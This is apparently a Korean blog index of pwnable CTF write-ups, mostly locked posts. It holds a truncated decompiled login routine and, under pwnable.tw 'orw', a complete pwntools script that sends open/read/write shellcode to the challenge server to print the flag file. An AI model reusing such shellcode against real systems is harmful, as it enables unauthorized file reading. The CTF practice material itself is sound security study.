pwnable(115)
-
dreamhack.io - tcache_dup
보호되어 있는 글입니다.
2021.09.26 -
pwnable.kr - simple login
main문은 아래와 같다. int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+4h] [ebp-3Ch] int v5; // [esp+18h] [ebp-28h] BYREF char input[30]; // [esp+1Eh] [ebp-22h] BYREF unsigned int base64_decoded; // [esp+3Ch] [ebp-4h] memset(input, 0, sizeof(input)); setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); printf("Authenticate : ", v4); _isoc99_scanf("%30s", input); memset(..
2021.09.23 -
dreamhack.io - house_of_spirit
보호되어 있는 글입니다.
2021.09.08 -
dreamhack.io - iofile_vtable
보호되어 있는 글입니다.
2021.09.07 -
dreamhack.io - tcache_dup2
보호되어 있는 글입니다.
2021.09.03 -
pwnable.tw - orw
쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()
2021.08.31